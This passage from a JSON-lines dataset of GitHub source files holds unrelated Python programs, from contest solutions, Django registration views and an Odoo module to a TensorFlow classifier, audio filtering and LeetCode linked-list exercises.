resolve():\n n = int(input())\n A = list(map(int, input().split()))\n\n res = 0\n for i in range(n):\n if A[A[i] - 1] == i + 1:\n res += 1\n\n print(res // 2)\n\n\nif __name__ == '__main__':\n resolve()\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03993/s198933393.py","file_name":"s198933393.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18370862559","text":"from collections import Counter\nN = int(input())\na = list(map(int, input().split()))\nl = Counter(a)\nall_xor = 0\nif N % 3 != 0:\n if l[0] != N:\n print(\"No\")\n exit()\n else:\n print(\"Yes\")\n exit()\nfor _l in l.keys():\n if l[_l] == N // 3:\n continue\n if _l == 0:\n if l[0] == N:\n print(\"Yes\")\n exit()\n if l[0] != N // 3 or len(l) != 2:\n print(\"No\")\n exit()\n if l[_l] == (2 * N) // 3 and l[0] == N // 3:\n print(\"Yes\")\n exit()\n else:\n print(\"No\")\n exit()\nfor i in range(N):\n all_xor = a[i] ^ all_xor\nif all_xor == 0:\n print(\"Yes\")\nelse:\n print(\"No\")\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02975/s972145812.py","file_name":"s972145812.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18222137839","text":"def main():\n k = int(input())\n a, b = map(int, input().split())\n f = [1 for i in range(a, b+1) if i%k == 0]\n if f:\n print(\"OK\")\n else:\n print(\"NG\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02693/s727568938.py","file_name":"s727568938.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"71900047018","text":"from django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse\nfrom django.views.generic.base import TemplateView\nfrom django.template.loader import render_to_string\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.utils.encoding import force_bytes, force_str\nfrom django.core import mail\nfrom django.utils.html import strip_tags\nfrom .forms import CustomUserCreationForm\nfrom .tokens import account_activation_token\n\ndef register(request):\n if request.method == \"GET\":\n return render(\n request, \"users/register_form.html\",\n {\"form\": CustomUserCreationForm}\n )\n elif request.method == \"POST\":\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.is_active = False\n user.save()\n activateEmail(request, user, form.cleaned_data.get('email'))\n return redirect(reverse(\"register_done\"))\n return render(\n request, \"users/register_form.html\",\n {\"form\": form}\n )\n\n\ndef activateEmail(request, user, to_email):\n mail_subject = 'Activate your Data Governance DB user account.'\n html_message = render_to_string('users/register_email.html', {\n 'user': user.username,\n 'domain': get_current_site(request).domain,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n 'token': account_activation_token.make_token(user),\n 'protocol': 'https' if request.is_secure() else 'http'\n })\n plain_message = strip_tags(html_message)\n from_email = 'Data Governance DB <{}>'.format(settings.EMAIL_FROM)\n to = user.email\n mail.send_mail(mail_subject, plain_message, from_email, [to], html_message=html_message)\n\n\nclass RegisterDone(TemplateView):\n template_name = \"users/register_done.html\"\n\n\ndef register_complete(request, uidb64, token):\n User = get_user_model()\n try:\n uid = force_str(urlsafe_base64_decode(uidb64))\n user = User.objects.get(pk=uid)\n except(TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n\n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.save()\n return render(\n request, \"users/register_complete.html\", {\"validlink\": True}\n )\n else:\n return render(\n request, \"users/register_complete.html\", {\"validlink\": False}\n )\n","repo_name":"devinit/data-governance-db","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"644932554","text":"import wave\nimport numpy\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nfrom scipy.signal import filtfilt\n\n# open the audio file and extract some information\nspf = wave.open('test_voice_male.wav','rb')\n(nChannels, sampWidth, sampleRate, nFrames, compType, compName) = spf.getparams()\n\n# extract audio from wav file\ninput_signal = spf.readframes(-1)\ninput_signal = numpy.fromstring(input_signal, 'Int16')\namp = 1.0\ninput_signal = amp * input_signal / max(abs(max(input_signal)),abs(min(input_signal)))\nspf.close()\n\n# create the filter\nN = 4\nnyq = 0.5 * sampleRate\nlow = 100 / nyq\nhigh = 500 / nyq\nb, a = signal.butter(N, [low, high], btype='band')\n\n# apply filter\noutput_signal = signal.filtfilt(b, a, input_signal)\n\n# create output file\nwav_out = wave.open(\"output.wav\", \"wb\")\nwav_out.setparams((nChannels, sampWidth, sampleRate, nFrames, compType, compName))\n\n# write to output file\nwav_out.writeframes(output_signal.tobytes())\nwav_out.close()\n\n# plot the signals\nplt.figure(\"input\")\nt = numpy.linspace(0, nFrames/sampWidth, nFrames, endpoint = False)\nplt.plot(t, input_signal, label='Input')\nplt.figure(\"output\")\nplt.plot(t, output_signal, label='Output')\nplt.show()\n","repo_name":"Mickvdw/4WBB0-hearing_aid","sub_path":"test2_bandpass.py","file_name":"test2_bandpass.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"27176566648","text":"from __future__ import absolute_import, division, print_function\nimport tensorflow as tf\nimport numpy as np\n\n# 유전자 발현에 근거한 암 분류 모델 데이터\n# Cancer_1 -> 1(암환자), 0(정상인)\nxy = np.loadtxt('D:/works_tf/test_tensorflow1.x/test_data/cancer_data.csv',delimiter=',', dtype=np.float32)\nx_data = xy[:, 0:-1]\ny_data = xy[:, -1:]\n\nprint(y_data)\n\n# 프로그램 실행 순간에 변수값을 입력하기 위해 placeholder 함수 사용\nX = tf.placeholder(tf.float32, shape=[None, 10]) # 10개의 feature로 구성 된 shape.\nY = tf.placeholder(tf.float32, shape=[None, 1]) # 1개의 결과로 구성된 shape\n\n# W와 b값의 초기값 정보가 없기에 랜덤하게 값을 설정\nW = tf.Variable(tf.random_normal([10, 1], mean=0.01, stddev=0.02), name='weight') # 10개가 입력되서 1개의 결과가를 가짐\nb = tf.Variable(tf.random_normal([1]))\n\n# Logistic Regression을 적용(tf.sigmoid() == 0과 1 사이의 값을 만들기 위한 시그모이드 함수)\nhypothesis = tf.sigmoid(tf.matmul(X, W) + b)\n\n# cost = tf.reduce_mean(tf.square(hypothesis - Y))\n# cost = tf.reduce_mean(-Y * tf.log(hypothesis ) + (1-Y) * tf.log(1-hypothesis ))\ncost = -tf.reduce_mean(Y * tf.log(hypothesis ) + (1 - Y) * tf.log(1 - hypothesis))\n\n# lerning_rate 가 중요함. 최초 0.01부터 시작해서 조절하면 됨.\ntrain = tf.train.GradientDescentOptimizer(learning_rate = 0.002).minimize(cost)\n\npredict = tf.cast(hypothesis > 0.5, dtype=tf.float32)\n\naccuracy = tf.reduce_mean(tf.cast(tf.equal(predict, Y), dtype=tf.float32))\n\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\n\nfor step in range(10001):\n cost_val, hy_val, _ = sess.run([cost, hypothesis, train], feed_dict={X: x_data, Y: y_data})\n # if step%1000 == 0:\n # print(step, \"COST : \", cost_val, \"hypothesis : \",hy_val)\n\n\nh, c, a = sess.run([hypothesis,predict, accuracy], feed_dict={X:x_data, Y:y_data})\n\n\n# print(\"\\nHypothesis : \",h, \"\\nCorrect(Y) :\", c, \"\\nAccuracy:\",a)\n\n\nfor index, value in enumerate(h):\n if index%100 == 0:\n print(\"INDEX : \",index , \"예측값 :\", value, \"암환자여부 : \",'정상' if c[index] == 0 else '암환자', \"실제값 : \",x_data[index], y_data[index])\n\nprint(\"정확도 %s: \" % (round(a*100, 2)))\n\n\n\n","repo_name":"venuspink/test_tensorflow1.x","sub_path":"cancer_classification.py","file_name":"cancer_classification.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17278488532","text":"import pathlib\nfrom src.repositories.actionBar.core import hasSupportCooldown\nfrom src.utils.image import loadFromRGBToGray\n\n\ncurrentPath = pathlib.Path(__file__).parent.resolve()\n\n\ndef test_should_return_False_when_has_no_support_cooldown():\n screenshotImage = loadFromRGBToGray(f'{currentPath}/withoutSupportCooldown.png')\n hasCooldown = hasSupportCooldown(screenshotImage)\n expectedHasSupportCooldown = False\n assert hasCooldown == expectedHasSupportCooldown\n\n\ndef test_should_return_True_when_has_support_cooldown():\n screenshotImage = loadFromRGBToGray(f'{currentPath}/withSupportCooldown.png')\n hasCooldown = hasSupportCooldown(screenshotImage)\n expectedHasSupportCooldown = True\n assert hasCooldown == expectedHasSupportCooldown\n","repo_name":"lucasmonstrox/PyTibia","sub_path":"tests/unit/repositories/actionBar/core/hasSupportCooldown/test_hasSupportCooldown.py","file_name":"test_hasSupportCooldown.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"90"} +{"seq_id":"19470704027","text":"from odoo import api, fields, models\nfrom odoo.exceptions import ValidationError\n\n\n# #######Beneficent\nclass SpoBeneficent(models.Model):\n _name = 'spo.beneficent.info'\n\n #char\n name = fields.Char(string='Nombre')\n\nclass SpoAcademicProgram(models.Model):\n _name = 'spo.academic.program.info'\n # Char\n name = fields.Char(string='Nombre')\n #Integer\n spo_credits_saved = fields.Integer(string='Créditos Acumulados')\n spo_credits_saved_exeption = fields.Integer(string='Exepción')\n #Float\n @api.constrains('spo_average_saved','spo_average_saved_exception')\n def validationAverage(self):\n if self.spo_average_saved > 20 or self.spo_average_saved_exception > 20:raise ValidationError('El promedio no puede ser mayor a 20')\n elif self.spo_average_saved < 0 or self.spo_average_saved_exception < 0:raise ValidationError('El promedio no puede ser menor a 0')\n spo_average_saved = fields.Float(string='Promedio Ponderado Acumulado')\n spo_average_saved_exception = fields.Float(string='Exepción')\n #Many2many\n spo_university_ids = fields.Many2many('spo.university.info', string='Universidades')\n\nclass SpoAcademicProgramUniversity(models.Model):\n _name = 'spo.academic.program.uni.info'\n _rec_name='program'\n program = fields.Char(string='Programa')\n name = fields.Many2one(comodel_name='spo.academic.program.info', string='Programa')\n #Integer\n spo_credits_saved = fields.Integer(string='Parámetro (CA)')\n spo_credits_saved_exeption = fields.Integer(string='Parámetro (CA) Exepción')\n #Float\n @api.constrains('spo_average_saved','spo_average_saved_exception')\n def validationAverage(self):\n if self.spo_average_saved > 20 or self.spo_average_saved_exception > 20:raise ValidationError('El promedio no puede ser mayor a 20')\n elif self.spo_average_saved < 0 or self.spo_average_saved_exception < 0:raise ValidationError('El promedio no puede ser menor a 0')\n spo_average_saved = fields.Float(string='Parámetro (PPA)')\n spo_average_saved_exception = fields.Float(string='Parámetro (PPA) Exepción')\n\n #Many2many\n spo_university_id = fields.Many2one('spo.university.info', string='Universidad')\n\nclass SpoCareers(models.Model):\n _name = 'spo.careers.info'\n\n #Char\n name = fields.Char(string='Nombre')\n\n #Many2one\n spo_type_AP_id = fields.Many2one('spo.academic.program.info', string='Tipo')\n \n spo_type_career = fields.Selection([\n ('prim', 'Principal'),\n ('secu', 'Secundaríia')\n ], string='Tipo de Carrera')\n\n spo_university_ids = fields.Many2many('spo.university.info', string='Universidades')\n \nclass SpoCareersMixed(models.Model):\n _name = 'spo.careers.mixed'\n _rec_name='display_name'\n spo_university_id = fields.Many2one('spo.university.info', string='Universidad')\n spo_academic_program_id = fields.Many2one('spo.academic.program.info', string='Programa Academico')\n spo_academic_program_uni_id = fields.Many2one('spo.academic.program.uni.info', string='Programa Académico')\n spo_principal_career_id = fields.Many2one('spo.careers.info', string='Carrera Primaria')\n spo_principal_career = fields.Char(string='Carrera Primaria')\n spo_second_career_id = fields.Many2one('spo.careers.info', string='Carrera Secundaria')\n spo_second_career = fields.Char(string='Carrera Secundaria')\n\n @api.depends('spo_principal_career','spo_second_career')\n def _getName(self):\n for rec in self:\n if rec.spo_principal_career and not rec.spo_second_career:rec.display_name = f'{rec.spo_principal_career} / Ninguna'\n elif not rec.spo_principal_career and rec.spo_second_career:rec.display_name = ''\n elif rec.spo_principal_career and rec.spo_second_career:rec.display_name = f'{rec.spo_principal_career} / {rec.spo_second_career}'\n else:rec.display_name = ''\n display_name = fields.Char(string='Carrera',compute='_getName')\n spo_total_credits = fields.Integer(string='Créditos Totales')\n spo_credits_semester = fields.Integer(string='Créditos por Semestre')\n spo_CCU = fields.Float(string='Costo del Crédito Universitario', related='spo_university_id.spo_CCU')\n spo_CM = fields.Float(string='Costo de Mensualidad',related='spo_university_id.spo_CM')\n\nclass SpoUniversity(models.Model):\n _name= 'spo.university.info'\n _rec_name = 'short_name'\n name = fields.Many2one('res.partner',string='Nombre')\n short_name = fields.Char(string='Nombre Corto')\n spo_email = fields.Char(string='Correo')\n\n def _spo_CGS_value(self):\n val1= self.env['ir.config_parameter'].search([('key','=','sponsor_educative_credit.spo_CGS_value')])\n value = None\n if val1:\n for vals in val1:value = vals.value\n return value\n spo_CGS = fields.Float(string='Costo de Gestión en Soles', digits=(2, 2), default=_spo_CGS_value)\n\n def _spo_TD_value(self):\n val2= self.env['ir.config_parameter'].search([('key','=','sponsor_educative_credit.spo_TD_value')])\n value = None\n if val2:\n for vals in val2:value = vals.value\n return value\n spo_TD = fields.Float(string='Tasa de Seguro de Desgravamen %', digits=(2, 3), default=_spo_TD_value)\n\n def _spo_TIA_value(self):\n val3= self.env['ir.config_parameter'].search([('key','=','sponsor_educative_credit.spo_TIA_value')])\n value = None\n if val3:\n for vals in val3:value = vals.value\n return value\n spo_TIA = fields.Float(string='Tasa de Interes Anual %', digits=(2, 2),default=_spo_TIA_value)\n spo_CCU = fields.Float(string='Costo del Crédito Universitario')\n spo_CM = fields.Float(string='Costo de Mensualidad')\n# ############ credit oportunities\nclass SpoState1(models.Model):\n\n _name ='spo.state.1.info'\n\n name = fields.Char(string='Nombre del Estado')\n\nclass SpoState2(models.Model):\n\n _name ='spo.state.2.info'\n\n name = fields.Char(string='Nombre del Estado')\n \nclass SpoState3(models.Model):\n\n _name ='spo.state.3.info'\n\n name = fields.Char(string='Nombre del Estado')\n\nclass SpoState4(models.Model):\n\n _name ='spo.state.4.info'\n\n\n name = fields.Char(string='Nombre del Resultado')\n \nclass SpoState5(models.Model):\n\n _name ='spo.state.5.info'\n\n name = fields.Char(string='Nombre del Resultado')\n \nclass SpoState6(models.Model):\n\n _name ='spo.state.6.info'\n\n name = fields.Char(string='Nombre del Resultado')\n \nclass SpoRiskMotive(models.Model):\n _name='spo.risk.motive.info'\n\n name = fields.Char(string='Nombre del Motivo de Riesgo')\n\nclass SpoContractStates(models.Model):\n _name='spo.contract.states.info'\n\n name = fields.Char(string='Nombre')\n\n type_state = fields.Selection(selection=[('1', '1'), ('2', '2'),('3', '3'),('4', '4'),])\n\nclass SpoCreditsSemester(models.Model):\n _name='spo.credits.semester.info'\n\n _rec_name = 'value'\n \n academic_program_id = fields.Many2one(comodel_name='spo.academic.program.info', string='Programa Académico')\n\n second_career = fields.Boolean(string='Segunda Carrera')\n\n value = fields.Integer(string='Valor')\n \nscription = fields.Char(string='Descripción de Semestre')\n \nclass SpoMissSemester(models.Model):\n _name='spo.miss.semester'\n\n _rec_name='number'\n\n number = fields.Integer(string='Numero de Semestre Faltante')\n\nclass SpoCuotas(models.Model):\n _name='spo.cuotas.info'\n\n name = fields.Integer(string='Valor')\n \n spo_Type_installment = fields.Selection(string='tipo de Cuota', selection=[('student', 'Estudiante'), ('graduate', 'Graduado')])\n \n spo_academic_program_id = fields.Many2one('spo.academic.program.info', string='Programa Academico')\n\n spo_miss_semester = fields.Many2one(comodel_name='spo.miss.semester',string='Semestres Pendientes')\n \n \nclass SpoSemesterInf(models.Model):\n _name = 'spo.semester.info'","repo_name":"GpozzoR/Sponosr-16","sub_path":"models/spo_info.py","file_name":"spo_info.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"40618555824","text":"# _*_coding:utf-8_*_\n'''\n将两个有序链表合并为一个新的有序链表并返回。\n新链表是通过拼接给定的两个链表的所有节点组成的。 \n\n示例:\n输入:1->2->4, 1->3->4\n输出:1->1->2->3->4->4\n\n'''\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n '''\n 我们可以递归的定义两个链表的合并操作\n 当链表l1为空,则不用合并直接为l2,当链表l2为空时候,则直接返回l1\n 当链表l1 l2均不为空,则递归的遍历l1,l2\n 不过我们要判断 l1 和 l2 哪一个链表的头节点的值更小,然后递归的决定\n 下一个添加到结果里的节点。如果两个链表有一个为空,递归结束。\n :param l1:\n :param l2:\n :return:\n '''\n if l1 is None: # 终止条件,直到两个链表都空\n return l2\n elif l2 is None:\n return l1\n elif l1.val < l2.val: # 递归调用\n l1.next = self.mergeTwoLists(l1.next, l2)\n return l1\n else:\n l2.next = self.mergeTwoLists(l1, l2.next)\n return l2\n \n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n ''' \n 对上面方法的改进,将判断放入else里面,我发现无论是时间,还是空间\n 都应该更快,从提交结果来看。\n 但是两种方法的时间复杂度都为O(n),空间复杂度为O(n)\n \n 对复杂度的分析:\n 时间复杂度:O(n+m),其中 n 和 m 分别为两个链表的长度。每次调用都会取掉l1或者l2的头结点\n (直到至少有一个链表为空),函数mergeTwoList至多只会递归调用每个节点依次,\n 因此,时间复杂度取决于合并后的链表长度,即O(n+m)\n 空间复杂度:O(n+m),其中 n 和 m 分别为两个链表的长度。递归调用 mergeTwoLists 函数时需要\n 消耗空间,栈空间的大小取决于递归调用的深度。结束递归调用时mergeTwoLists函数最多\n 调用 n+m 次,因此空间复杂度为O(n+m)\n '''\n if l1 is None:\n return l2\n elif l2 is None:\n return l1\n else:\n if l1.val < l2.val:\n l1.next = self.mergeTwoLists(l1.next, l2)\n return l1\n else:\n l2.next = self.mergeTwoLists(l1, l2.next)\n return l2\n\n def mergeTwoLists1(self, l1: ListNode, l2: ListNode) -> ListNode:\n '''\n 最简单的思路:\n 这里新增了一个list,并且使用了sort()内置方法。。。。\n :param l1:\n :param l2:\n :return:\n '''\n results = []\n while l1:\n results.append(l1.val)\n l1 = l1.next\n while l2:\n results.append(l2.val)\n l2 = l2.next\n # 但是这里增加了一个内置的 sort() 方法,所以我不是很喜欢这个解法\n # 其实可以对 l1.val 与 l2.val 进行比较,这样就不用使用sort() 方法了\n results.sort()\n head = ListNode(0)\n dummy = head\n for i in results:\n dummy.next = ListNode(i)\n dummy = dummy.next\n return head.next\n\n def mergeTwoLists2(self, l1: ListNode, l2: ListNode) -> ListNode:\n '''\n 我们也可以使用迭代的方法来实现上述算法,当l1和l2都不是空链表时,判断 l1 和 l2 哪一个\n 链表的头节点的值更小,将较小值的节点添加到结果里,当一个节点被添加到结果里之后,将对应\n 链表中的节点向后移一位。\n \n 复杂度分析:\n 时间复杂度:O(n+m),其中n和m分别为两个链表的长度,因为每次循环迭代中,l1和l2只有一个\n 元素会被放进合并链表中,因此while循环的次数不会超过两个链表的长度之和,所有其\n 它的时间复杂度都是常数级别的,因此总的时间复杂度为 O(n+m)\n 空间复杂度:O(1),我们只需要常数的空间存放若干变量\n '''\n # 创建哑节点作为 结果链表 的开头,因此是不能移动的\n # 为了把两个链表 merge 的结果放到结果链表的最后,就需要一个move游标指向 结果链表 的最后一个元素\n # 初始时,move指向哑节点,之后随着结果链表的增加而不停地向后移动,始终保持其指向结果链表 的最后一个元素\n dummy = ListNode(0)\n # 有个游标,标识 结果链表的 结尾\n move = dummy\n # l1 和 l2 都未遍历结束\n while l1 and l2:\n # 如果l1 的 数值比较小\n if l1.val <= l2.val:\n # 把 l1 头部节点拼接到 结果链表的结尾\n move.next = l1\n l1 = l1.next # l1 指向下一��节点\n else:\n # 把 l2头部节点拼接到 结果链表 的结尾\n move.next = l2\n l2 = l2.next # l2指向下一个节点\n # 移动 结果链表的结尾指针\n move = move.next\n # l1 或者 l2 尚未使用完,拼接到 结果链表 的最后\n move.next = l1 if l1 else l2\n # 返回哑节点的下一个位置\n return dummy.next\n","repo_name":"LeBron-Jian/BasicAlgorithmPractice","sub_path":"LeetCode_practice/LinkedList/0021_MergeTwoSortedLists.py","file_name":"0021_MergeTwoSortedLists.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"zh","doc_type":"code","stars":12,"dataset":"github-code","pt":"90"} +{"seq_id":"24083260394","text":"import time\nimport text_analytic_tools.text_analysis.co_occurrence as co_occurrence\nimport text_analytic_tools.common.text_corpus as text_corpus\nimport text_analytic_tools\nimport text_analytic_tools.utility as utility\n\nlogger = utility.getLogger('tCoIR')\n\ncurrent_domain = text_analytic_tools.CURRENT_DOMAIN\n\nregion_names = [\n 'AFRICA',\n 'ASIA',\n 'EUROPA',\n 'Germany (all)',\n 'NORTH AMERICA',\n 'OCEANIA',\n 'PartyOf5',\n 'SOUTH AMERICA',\n 'WTI:Arab',\n 'WTI:Asian',\n 'WTI:Commonwealth',\n 'WTI:Communist',\n 'WTI:Latin America',\n 'WTI:Multiple Parties',\n 'WTI:United States of America',\n 'WTI:Western Europe'\n]\n\ndef store_result(data, target_filename):\n try:\n data.to_excel(target_filename)\n except ValueError as ex:\n logger.error(ex)\n logger.info('Storng data as CSV (tab) instead')\n target_filename = target_filename[:-4] + 'tsv'\n data.to_csv(target_filename, sep='\\t')\n\ndef compute_source_files(source_files):\n for source_file, tag in source_files:\n method = 'HAL'\n corpus = text_corpus.SimplePreparedTextCorpus(source_file, lowercase=True)\n document_index = current_domain.compile_documents(corpus)\n for window_size in [5, 10, 20]:\n result_filename = 'CO_tCoIR_en_45-72.{}_{}_{}_{}.xlsx'.format(time.strftime(\"%Y%m%d_%H%M\"), method, window_size, tag)\n print('Result filename: {}'.format(result_filename))\n df = co_occurrence.compute(corpus, document_index, window_size=window_size, distance_metric=0, normalize='size', method=method)\n store_result(df, result_filename)\n\ndef compute_source_files_by_region_filter(source_files):\n\n for source_file, tag, region_name, closed_region in source_files:\n method = 'HAL'\n document_index = current_domain.get_region_document_index(source_file, region_name=region_name, closed_region=closed_region)\n filenames = document_index.filename.tolist()\n corpus = text_corpus.SimplePreparedTextCorpus(source_file, lowercase=True, itemfilter=filenames)\n document_index = current_domain.compile_documents(corpus)\n for window_size in [5]:\n tag = '{}_{}_{}'.format(tag, region_name.lower().replace(':','_').replace(' ', '_'), 'closed' if closed_region else 'open')\n result_filename = 'CO_tCoIR_en_45-72.{}_{}_{}_{}.xlsx'.format(time.strftime(\"%Y%m%d\"), method, window_size, tag)\n print('Result filename: {}'.format(result_filename))\n df = co_occurrence.compute(corpus, document_index, window_size=window_size, distance_metric=0, normalize='size', method=method)\n store_result(df, result_filename)\n\n# RUN FOR ENTTIRE CORPUS\n\n# entire_corpus_source_files = [\n# ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.ADJ.NOUN.tokenized.zip', 'lemma.ADJ.NOUN'),\n# ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.ADJ.NOUN.VERB.tokenized.zip', 'lemma.ADJ.NOUN.VERB'),\n# ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.N.O.U.N.tokenized.zip', 'lemma.NOUN'),\n# ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.V.E.R.B.tokenized.zip', 'lemma.VERB')\n# ]\n# compute_source_files(entire_corpus_source_files)\n\n# RUN FOR SPECIFIC REGIONS:\n\nregion_source_files = [\n ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.ADJ.NOUN.VERB.tokenized.zip', 'lemma.ADJ.NOUN.VERB', 'WTI:Communist', False),\n ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.ADJ.NOUN.VERB.tokenized.zip', 'lemma.ADJ.NOUN.VERB', 'WTI:Communist', True),\n ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.ADJ.NOUN.VERB.tokenized.zip', 'lemma.ADJ.NOUN.VERB', 'WTI:Western Europe', False),\n ('data/tCoIR/tCoIR_en_45-72.txt_preprocessed_20191028.lemma.ADJ.NOUN.VERB.tokenized.zip', 'lemma.ADJ.NOUN.VERB', 'WTI:Western Europe', True)\n]\ncompute_source_files_by_region_filter(region_source_files)\n\nprint('Done!')","repo_name":"humlab/text_analytic_tools","sub_path":"tCoIR_co_runner.py","file_name":"tCoIR_co_runner.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"16948237071","text":"from typing import List\n\n\nclass Solution:\n def fairCandySwap(self, A: List[int], B: List[int]) -> List[int]:\n sum_a = sum(A)\n sum_b = sum(B)\n\n for x in A:\n # Complement\n y = x + int((sum_b - sum_a)/ 2)\n if y in B:\n return [x, y]\n\n def fairCandySwap2(self, A: List[int], B: List[int]) -> List[int]:\n sum_a = sum(A)\n sum_b = sum(B)\n avg = int((sum_a + sum_b) / 2)\n\n for i in range(len(A)):\n for j in range(len(B)):\n if sum_a - A[i] + B[j] == avg:\n return [A[i], B[j]]\n\n\nA = [1,1]; B = [2,2]\nA = [1,2]; B = [2,3]\nA = [2]; B = [1,3]\nA = [1, 2, 5]; B = [2, 4]\ns = Solution()\nprint(s.fairCandySwap(A,B))\nprint(s.fairCandySwap2(A,B))\n","repo_name":"iamsuman/algorithms","sub_path":"iv/Leetcode/easy/888_fair_candy_swap.py","file_name":"888_fair_candy_swap.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"4562099866","text":"import cv2\r\nimport numpy as np\r\nfrom skimage import io, data\r\nimport matplotlib.pyplot as plt\r\n\r\nNEIGHBOR_HOODS_4 = True\r\nOFFSETS_4 = [[0, -1], [-1, 0], [0, 0], [1, 0], [0, 1]]\r\n\r\ndef reorganize(binary_img: np.array):\r\n index_map = []\r\n points = []\r\n index = -1\r\n rows, cols = binary_img.shape\r\n for row in range(rows):\r\n for col in range(cols):\r\n var = binary_img[row][col]\r\n if var < 0.5:\r\n continue\r\n if var in index_map:\r\n index = index_map.index(var)\r\n num = index + 1\r\n else:\r\n index = len(index_map)\r\n num = index + 1\r\n index_map.append(var)\r\n points.append([])\r\n binary_img[row][col] = num\r\n points[index].append([row, col])\r\n return binary_img, points\r\n\r\ndef recursive_seed(binary_img: np.array, seed_row, seed_col, offsets, num, max_num=100):\r\n rows, cols = binary_img.shape\r\n binary_img[seed_row][seed_col] = num\r\n for offset in offsets:\r\n neighbor_row = min(max(0, seed_row+offset[0]), rows-1)\r\n neighbor_col = min(max(0, seed_col+offset[1]), cols-1)\r\n var = binary_img[neighbor_row][neighbor_col]\r\n if var < max_num:\r\n continue\r\n binary_img = recursive_seed(binary_img, neighbor_row, neighbor_col, offsets, num, max_num)\r\n return binary_img\r\n\r\ndef Seed_Filling(binary_img, neighbor_hoods, max_num=100):\r\n if neighbor_hoods == NEIGHBOR_HOODS_4:\r\n offsets = OFFSETS_4\r\n else:\r\n raise ValueError\r\n\r\n num = 1\r\n rows, cols = binary_img.shape\r\n for row in range(rows):\r\n for col in range(cols):\r\n var = binary_img[row][col]\r\n if var <= max_num:\r\n continue\r\n binary_img = recursive_seed(binary_img, row, col, offsets, num, max_num=100)\r\n num += 1\r\n return binary_img\r\n\r\nprint(\"Seed_Filling\")\r\nbinary_img = Seed_Filling(binary_img, NEIGHBOR_HOODS_4)\r\nbinary_img, points = reorganize(binary_img)\r\nprint(binary_img, points)\r\n\r\nimage = io.imread('./taxi_zone_map_bronx.jpg')\r\nprint(image.shape)\r\nprint(image[700][1010])\r\n# RGB color for green part [201 242 208]\r\n#io.imshow(image)\r\n#io.imsave('./test.jpg',image)\r\n\r\nbinary_img = np.zeros((4, 7), dtype=np.int16)\r\nindex = [[0, 2], [0, 5],\r\n [1, 0], [1, 1], [1, 2], [1, 4], [1, 5], [1, 6],\r\n [2, 2], [2, 5],\r\n [3, 1], [3, 2], [3, 4], [3, 6]]\r\nfor i in index:\r\n binary_img[i[0],i[1]] = np.int16(255)\r\nprint(binary_img)\r\nio.imshow(binary_img)\r\nplt.show()","repo_name":"emiyacody/Heatmap","sub_path":"Visualization.py","file_name":"Visualization.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"25645039423","text":"#Exercício Python 28: Escreva um programa que faça o computador “pensar” em um número inteiro entre 0 e 5 e peça para o usuário tentar descobrir qual foi o número escolhido pelo computador. O programa deverá escrever na tela se o usuário venceu ou perdeu.\n\nfrom random import randint\nfrom time import sleep\ncomputador = randint(0, 5)\njogador = int(input('Digite um número que esta pensando: '))\nprint('Processando...')\nsleep(2)\nif computador == jogador:\n print('Você Ganhou! Estava pensando nisso!')\nelse:\n print('Eu ganhei! Você pensou no número {} e eu pensei no número {}'.format(jogador, 